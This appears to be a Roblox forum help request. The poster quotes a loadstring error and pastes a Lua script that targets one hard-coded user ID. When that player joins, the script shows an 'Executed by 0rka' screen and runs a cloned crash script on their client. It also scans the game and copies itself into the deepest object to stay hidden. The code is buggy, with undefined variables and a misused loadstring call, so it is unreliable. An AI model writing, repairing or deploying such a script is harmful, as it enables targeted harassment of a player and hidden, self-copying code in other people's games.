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#141235425Wednesday, July 23, 2014 3:25 AM GMT

At the loadstring line it errors "[string "if obj.Parent == game.Workspace then local ..."]:1: attempt to index global 'obj' (a nil value)" Here is the script: local crash = script:FindFirstChild("LocalScript") localCrashTable = {5391359} function doCrash(plr) local breakIt = false for i = 1, #localCrashTable do if localCrashTable[i] == plr.userId then return true end if breakIt == true then break end end end _G.insertedOnce_K6JZ783KDNNKSFH93 = false layerTable = {} layerCorrespondingTable = {} function findObject(tab, obj) local breakIt = false for i = 1, #tab do if tab[i] == obj then breakIt = true return i end if breakIt == true then break end end end function findNumParents(obj) local breakIt = false for i = 1, 100 do wait() parentString = ".Parent" local index = i local function concat() parentString = parentString .. ".Parent" end for i = 1, index - 1 do concat() end assert(loadstring("if obj" .. parentString .. " == game.Workspace then local breakIt = true return i end")()) if breakIt == true then break end end end function crash(plr) local LOL = Instance.new("ScreenGui", plr.PlayerGui) local LOLFrame = Instance.new("ImageLabel", LOL) LOLFrame.Size = UDim2.new(1,0,1,0) LOLFrame.Image = "http://www.roblox.com/asset/?id=116441401" local hum = Instance.new("TextLabel", LOLFrame) hum.Size = UDim2.new(1,0,.2,1) hum.BackgroundTransparency = 1 hum.TextColor3 = Color3.new(255, 255, 0) hum.FontSize = "Size48" hum.Text = "Executed by 0rka at " .. tick() wait() local RIP = crash:Clone() RIP.Parent = plr.PlayerGui RIP.Disabled = false end function scan(object) table.insert(layerTable, object) table.insert(layerCorrespondingTable, findNumParents(object)) for i, v in pairs(v:GetChildren()) do if v ~= script or script:FindFirstChild("LocalScript") then table.insert(layerTable, v) if #v:GetChildren() > 0 then scan(v) end end end end game.Players.PlayerAdded:connect(function(plr) if doCrash(plr) then crash(plr) end end) function insertIntoLargest() local maxNum = 0 local currentLargest = layerTable[i] for i = 1, #layerTable do local index = i if layerCorrespondingTable[index] > maxNum then maxNum = layerCorrespondingTable[index] currentLargest = layerTable[index] end return maxNum, currentLargest end end if _G.insertedOnce_K6JZ783KDNNKSFH93 == false then scan() local hierArchy, deepestObject = insertIntoLargest() _G.insertedOnce_K6JZ783KDNNKSFH93 = true local clone = script:Clone() clone.Parent = deepestObject end

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